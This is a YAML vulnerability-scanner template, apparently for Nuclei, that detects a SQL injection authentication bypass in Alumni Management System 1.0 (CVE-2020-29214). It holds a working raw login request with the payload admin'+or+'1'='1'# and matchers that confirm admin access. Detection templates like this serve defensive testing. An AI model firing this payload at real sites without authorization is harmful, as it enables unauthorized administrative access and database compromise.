http:
    - cookie-reuse: true
      matchers:
        - condition: and
          part: body
          type: word
          words:
            - Welcome back Admin!
            - Alumni List
        - negative: true
          part: body
          type: word
          words:
            - '#login-form'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /admin/ajax.php?action=login HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
        - |
          GET /admin/index.php?page=home HTTP/1.1
          Host: {{Hostname}}
id: alumni-management-sqli
info:
    author: arafatansari
    classification:
        cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
        cvss-score: 10
        cwe-id: CWE-89
    description: |
        Alumni Management System 1.0 contains a SQL injection vulnerability via admin/login in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
    metadata:
        max-request: 2
    name: Alumni Management System 1.0 - SQL Injection
    reference:
        - https://www.exploit-db.com/exploits/48883
        - https://nvd.nist.gov/vuln/detail/CVE-2020-29214
    severity: critical
    tags:
        - auth-bypass
        - edb
        - alumni
